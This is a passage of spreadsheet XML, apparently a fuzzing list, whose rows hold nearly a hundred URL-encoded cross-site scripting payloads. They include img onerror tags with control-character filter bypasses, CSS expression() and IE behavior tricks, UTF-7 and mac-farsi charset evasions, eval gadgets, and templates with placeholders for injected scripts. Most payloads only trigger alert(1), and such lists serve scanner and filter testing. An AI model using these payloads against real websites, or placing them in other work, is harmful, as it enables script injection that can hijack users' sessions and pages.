      <c r="A320" s="3" t="s">
        <v>321</v>
      </c>
      <c r="B320" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx32src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="3" t="s">
        <v>318</v>
      </c>
      <c r="B321" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="3" t="s">
        <v>322</v>
      </c>
      <c r="B322" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx11src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="3" t="s">
        <v>315</v>
      </c>
      <c r="B323" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="3" t="s">
        <v>323</v>
      </c>
      <c r="B324" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx34src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="3" t="s">
        <v>324</v>
      </c>
      <c r="B325" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx39src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="3" t="s">
        <v>325</v>
      </c>
      <c r="B326" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx00src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="3" t="s">
        <v>326</v>
      </c>
      <c r="B327" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx09%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="3" t="s">
        <v>327</v>
      </c>
      <c r="B328" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx10%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="3" t="s">
        <v>328</v>
      </c>
      <c r="B329" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx13%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="3" t="s">
        <v>329</v>
      </c>
      <c r="B330" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx32%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="3" t="s">
        <v>330</v>
      </c>
      <c r="B331" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx12%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="3" t="s">
        <v>331</v>
      </c>
      <c r="B332" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx11%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="3" t="s">
        <v>332</v>
      </c>
      <c r="B333" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx00%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="3" t="s">
        <v>333</v>
      </c>
      <c r="B334" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%5Cx47%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="3" t="s">
        <v>334</v>
      </c>
      <c r="B335" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx09onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="3" t="s">
        <v>335</v>
      </c>
      <c r="B336" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx10onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="3" t="s">
        <v>336</v>
      </c>
      <c r="B337" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx11onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B338" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx12onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="3" t="s">
        <v>338</v>
      </c>
      <c r="B339" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%5Cx13onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="3" t="s">
        <v>339</v>
      </c>
      <c r="B340" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Ba%5D%5Bb%5D%5Bc%5Dsrc%5Bd%5D%3Dx%5Be%5Donerror%3D%5Bf%5D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="3" t="s">
        <v>340</v>
      </c>
      <c r="B341" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx09%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="3" t="s">
        <v>341</v>
      </c>
      <c r="B342" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx10%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="3" t="s">
        <v>342</v>
      </c>
      <c r="B343" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx11%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="3" t="s">
        <v>343</v>
      </c>
      <c r="B344" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx12%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="3" t="s">
        <v>344</v>
      </c>
      <c r="B345" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx32%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="3" t="s">
        <v>345</v>
      </c>
      <c r="B346" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dx%20onerror%3D%5Cx00%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="3" t="s">
        <v>346</v>
      </c>
      <c r="B347" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Djava%26%231%26%232%26%233%26%234%26%235%26%236%26%237%26%238%26%2311%26%2312script%3Ajavascript%3Aalert%281%29%3EXXX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="3" t="s">
        <v>347</v>
      </c>
      <c r="B348" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22x%60%20%60%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%60%20%60%3E</v>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="3" t="s">
        <v>348</v>
      </c>
      <c r="B349" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%20onerror%20%2F%22%20%27%22%3D%20alt%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="3" t="s">
        <v>349</v>
      </c>
      <c r="B350" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctitle%20onpropertychange%3Djavascript%3Aalert%281%29%3E%3C%2Ftitle%3E%3Ctitle%20title%3D%3E</v>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="3" t="s">
        <v>350</v>
      </c>
      <c r="B351" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Dhttp%3A%2F%2Ffoo.bar%2F%23x%3D%60y%3E%3C%2Fa%3E%3Cimg%20alt%3D%22%60%3E%3Cimg%20src%3Dx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%3C%2Fa%3E%22%3E</v>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="3" t="s">
        <v>351</v>
      </c>
      <c r="B352" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%5D%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%20--%3E</v>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="3" t="s">
        <v>352</v>
      </c>
      <c r="B353" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%5D%3E%20--%3E</v>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="3" t="s">
        <v>353</v>
      </c>
      <c r="B354" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22%2F%5C%25%28jscript%29s%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="3" t="s">
        <v>354</v>
      </c>
      <c r="B355" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22%5C%5C%25%28jscript%29s%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="3" t="s">
        <v>355</v>
      </c>
      <c r="B356" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20id%3D%22x%22%20classid%3D%22clsid%3ACB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C%2Fobject%3E%20%3Cobject%20classid%3D%22clsid%3A02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error%3D%22javascript%3Aalert%281%29%22%20style%3D%22behavior%3Aurl%28%23x%29%3B%22%3E%3Cparam%20name%3Dpostdomevents%20%2F%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="3" t="s">
        <v>356</v>
      </c>
      <c r="B357" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20style%3D%22-o-link%3A%27javascript%3Ajavascript%3Aalert%281%29%27%3B-o-link-source%3Acurrent%22%3EX</v>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="3" t="s">
        <v>357</v>
      </c>
      <c r="B358" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3Ep%5Bfoo%3Dbar%7B%7D%2A%7B-o-link%3A%27javascript%3Ajavascript%3Aalert%281%29%27%7D%7B%7D%2A%7B-o-link-source%3Acurrent%7D%5D%7Bcolor%3Ared%7D%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="3" t="s">
        <v>358</v>
      </c>
      <c r="B359" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Clink%20rel%3Dstylesheet%20href%3Ddata%3A%2C%2A%257bx%3Aexpression%28javascript%3Aalert%281%29%29%257d</v>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="3" t="s">
        <v>359</v>
      </c>
      <c r="B360" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40import%20%22data%3A%2C%2A%257bx%3Aexpression%28javascript%3Aalert%281%29%29%257D%22%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="3" t="s">
        <v>360</v>
      </c>
      <c r="B361" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20style%3D%22pointer-events%3Anone%3Bposition%3Aabsolute%3B%22%3E%3Ca%20style%3D%22position%3Aabsolute%3B%22%20onclick%3D%22javascript%3Aalert%281%29%3B%22%3EXXX%3C%2Fa%3E%3C%2Fa%3E%3Ca%20href%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EXXX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="3" t="s">
        <v>361</v>
      </c>
      <c r="B362" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%2A%5B%7B%7D%40import%27%25%28css%29s%3F%5D%3C%2Fstyle%3EX</v>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="3" t="s">
        <v>362</v>
      </c>
      <c r="B363" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22font-family%3A%27foo%26%2310%3B%3Bcolor%3Ared%3B%27%3B%22%3EXXX</v>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="3" t="s">
        <v>363</v>
      </c>
      <c r="B364" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22font-family%3Afoo%7Dcolor%3Dred%3B%22%3EXXX</v>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="3" t="s">
        <v>364</v>
      </c>
      <c r="B365" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%2F%20style%3Dx%3Aexpression%5C28javascript%3Aalert%281%29%5C29%3E</v>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="3" t="s">
        <v>365</v>
      </c>
      <c r="B366" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%2A%7Bx%3A%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E%28javascript%3Aalert%281%29%29%7D%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="3" t="s">
        <v>366</v>
      </c>
      <c r="B367" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3Dcontent%3Aurl%28%25%28svg%29s%29%3E%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="3" t="s">
        <v>367</v>
      </c>
      <c r="B368" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22list-style%3Aurl%28http%3A%2F%2Ffoo.f%29%5C20url%28javascript%3Ajavascript%3Aalert%281%29%29%3B%22%3EX</v>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="3" t="s">
        <v>368</v>
      </c>
      <c r="B369" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3Dd%3E%3Cdiv%20style%3D%22font-family%3A%27sans%5C27%5C3B%20color%5C3Ared%5C3B%27%22%3EX%3C%2Fdiv%3E%3C%2Fdiv%3E%20%3Cscript%3Ewith%28document.getElementById%28%22d%22%29%29innerHTML%3DinnerHTML%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="3" t="s">
        <v>369</v>
      </c>
      <c r="B370" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22background%3Aurl%28%2Ff%23%26%23127%3Boo%2F%3Bcolor%3Ared%2F%2A%2Ffoo.jpg%29%3B%22%3EX</v>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="3" t="s">
        <v>370</v>
      </c>
      <c r="B371" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22font-family%3Afoo%7Bbar%3Bbackground%3Aurl%28http%3A%2F%2Ffoo.f%2Foo%7D%3Bcolor%3Ared%2F%2A%2Ffoo.jpg%29%3B%22%3EX</v>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="3" t="s">
        <v>371</v>
      </c>
      <c r="B372" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3D%22x%22%3EXXX%3C%2Fdiv%3E%20%3Cstyle%3E%20%20%23x%7Bfont-family%3Afoo%5Bbar%3Bcolor%3Agreen%3B%7D%20%20%23y%5D%3Bcolor%3Ared%3B%7B%7D%20%20%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="3" t="s">
        <v>372</v>
      </c>
      <c r="B373" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cx%20style%3D%22background%3Aurl%28%27x%26%231%3B%3Bcolor%3Ared%3B%2F%2A%27%29%22%3EXXX%3C%2Fx%3E</v>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="3" t="s">
        <v>373</v>
      </c>
      <c r="B374" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%28%7Bset%2F%2A%2A%2F%24%28%24%29%7B_%2F%2A%2A%2Fsetter%3D%24%2C_%3Djavascript%3Aalert%281%29%7D%7D%29.%24%3Deval%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="3" t="s">
        <v>374</v>
      </c>
      <c r="B375" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%28%7B0%3A%230%3Deval%2F%230%23%2F%230%23%28javascript%3Aalert%281%29%29%7D%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="3" t="s">
        <v>375</v>
      </c>
      <c r="B376" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3EReferenceError.prototype.__defineGetter__%28%27name%27%2C%20function%28%29%7Bjavascript%3Aalert%281%29%7D%29%2Cx%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="3" t="s">
        <v>376</v>
      </c>
      <c r="B377" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3EObject.__noSuchMethod__%20%3D%20Function%2C%5B%7B%7D%5D%5B0%5D.constructor._%28%27javascript%3Aalert%281%29%27%29%28%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="3" t="s">
        <v>377</v>
      </c>
      <c r="B378" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%22x-imap4-modified-utf7%22%3E%26ADz%26AGn%26AG0%26AEf%26ACA%26AHM%26AHI%26AGO%26AD0%26AGn%26ACA%26AG8Abg%26AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ%26ACAAPABi</v>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="3" t="s">
        <v>378</v>
      </c>
      <c r="B379" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%22x-imap4-modified-utf7%22%3E%26%3Cscript%26S1%26TS%261%3Ealert%26A7%26%281%29%26R%26UA%3B%26%26%3C%26A9%2611%2Fscript%26X%26%3E</v>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="3" t="s">
        <v>379</v>
      </c>
      <c r="B380" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript%3Aalert%281%29%C2%BC%2Fscript%C2%BE</v>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="3" t="s">
        <v>380</v>
      </c>
      <c r="B381" s="4" t="str">
        <f t="shared" si="1"/>
        <v>X%3Cx%20style%3D%60behavior%3Aurl%28%23default%23time2%29%60%20onbegin%3D%60javascript%3Aalert%281%29%60%20%3E</v>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="3" t="s">
        <v>381</v>
      </c>
      <c r="B382" s="4" t="str">
        <f t="shared" si="1"/>
        <v>1%3Cset%2Fxmlns%3D%60urn%3Aschemas-microsoft-com%3Atime%60%20style%3D%60beh%26%23x41vior%3Aurl%28%23default%23time2%29%60%20attributename%3D%60innerhtml%60%20to%3D%60%26lt%3Bimg%2Fsrc%3D%26quot%3Bx%26quot%3Bonerror%3Djavascript%3Aalert%281%29%26gt%3B%60%3E</v>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="3" t="s">
        <v>382</v>
      </c>
      <c r="B383" s="4" t="str">
        <f t="shared" si="1"/>
        <v>1%3Canimate%2Fxmlns%3Durn%3Aschemas-microsoft-com%3Atime%20style%3Dbehavior%3Aurl%28%23default%23time2%29%20attributename%3Dinnerhtml%20values%3D%26lt%3Bimg%2Fsrc%3D%26quot%3B.%26quot%3Bonerror%3Djavascript%3Aalert%281%29%26gt%3B%3E</v>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="3" t="s">
        <v>383</v>
      </c>
      <c r="B384" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvmlframe%20xmlns%3Durn%3Aschemas-microsoft-com%3Avml%20style%3Dbehavior%3Aurl%28%23default%23vml%29%3Bposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%20src%3D%25%28vml%29s%23xss%3E%3C%2Fvmlframe%3E</v>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="3" t="s">
        <v>384</v>
      </c>
      <c r="B385" s="4" t="str">
        <f t="shared" si="1"/>
        <v>1%3Ca%20href%3D%23%3E%3Cline%20xmlns%3Durn%3Aschemas-microsoft-com%3Avml%20style%3Dbehavior%3Aurl%28%23default%23vml%29%3Bposition%3Aabsolute%20href%3Djavascript%3Ajavascript%3Aalert%281%29%20strokecolor%3Dwhite%20strokeweight%3D1000px%20from%3D0%20to%3D1000%20%2F%3E%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B386" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20style%3D%22behavior%3Aurl%28%23default%23AnchorClick%29%3B%22%20folder%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EXXX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="3" t="s">
        <v>386</v>
      </c>
      <c r="B387" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cx%20style%3D%22behavior%3Aurl%28%25%28sct%29s%29%22%3E</v>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="3" t="s">
        <v>387</v>
      </c>
      <c r="B388" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20id%3D%22xss%22%20src%3D%22%25%28htc%29s%22%3E%3C%2Fxml%3E%20%3Clabel%20dataformatas%3D%22html%22%20datasrc%3D%22%23xss%22%20datafld%3D%22payload%22%3E%3C%2Flabel%3E</v>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="3" t="s">
        <v>388</v>
      </c>
      <c r="B389" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cevent-source%20src%3D%22%25%28event%29s%22%20onload%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="3" t="s">
        <v>389</v>
      </c>
      <c r="B390" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3Cevent-source%20src%3D%22data%3Aapplication%2Fx-dom-event-stream%2CEvent%3Aclick%250Adata%3AXXX%250A%250A%22%3E</v>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="3" t="s">
        <v>390</v>
      </c>
      <c r="B391" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3D%22x%22%3Ex%3C%2Fdiv%3E%20%3Cxml%3Anamespace%20prefix%3D%22t%22%3E%20%3Cimport%20namespace%3D%22t%22%20implementation%3D%22%23default%23time2%22%3E%20%3Ct%3Aset%20attributeName%3D%22innerHTML%22%20targetElement%3D%22x%22%20to%3D%22%26lt%3Bimg%26%2311%3Bsrc%3Dx%3Ax%26%2311%3Bonerror%26%2311%3B%3Djavascript%3Aalert%281%29%26gt%3B%22%3E</v>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="3" t="s">
        <v>391</v>
      </c>
      <c r="B392" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%25%28payload%29s%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="3" t="s">
        <v>392</v>
      </c>
      <c r="B393" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%25%28jscript%29s%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="3" t="s">
        <v>393</v>
      </c>
      <c r="B394" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20language%3D%27javascript%27%20src%3D%27%25%28jscript%29s%27%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="3" t="s">
        <v>394</v>
      </c>
      <c r="B395" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="3" t="s">
        <v>395</v>
      </c>
      <c r="B396" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="3" t="s">
        <v>396</v>
      </c>
      <c r="B397" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Ajavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="3" t="s">
        <v>397</v>
      </c>
      <c r="B398" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%60javascript%3Ajavascript%3Aalert%281%29%60%3E</v>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="3" t="s">
        <v>398</v>
      </c>
      <c r="B399" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%25%28jscript%29s%3F%3CB%3E</v>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="3" t="s">
        <v>399</v>
      </c>
      <c r="B400" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E%3C%2FFRAMESET%3E</v>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="3" t="s">
        <v>400</v>
      </c>
      <c r="B401" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="3" t="s">
        <v>401</v>
      </c>
      <c r="B402" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Djavascript%3Ajavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="3" t="s">
        <v>402</v>
      </c>
      <c r="B403" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%20%20%20%20ascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="3" t="s">
        <v>403</v>
      </c>
      <c r="B404" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20onload%21%23%24%25%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="3" t="s">
        <v>404</v>
      </c>
      <c r="B405" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FSRC%3D%22%25%28jscript%29s%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="3" t="s">
        <v>405</v>
      </c>
      <c r="B406" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3E%25%28payload%29s%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="3" t="s">
        <v>406</v>
      </c>
      <c r="B407" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%22</v>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="3" t="s">
        <v>407</v>
      </c>
      <c r="B408" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%25%28scriptlet%29s%20%3C</v>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="3" t="s">
        <v>408</v>
      </c>
      <c r="B409" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="3" t="s">
        <v>409</v>
      </c>
      <c r="B410" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20DYNSRC%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="3" t="s">
        <v>410</v>
      </c>
      <c r="B411" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20LOWSRC%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="3" t="s">
        <v>411</v>
      </c>
      <c r="B412" s="4" t="str">
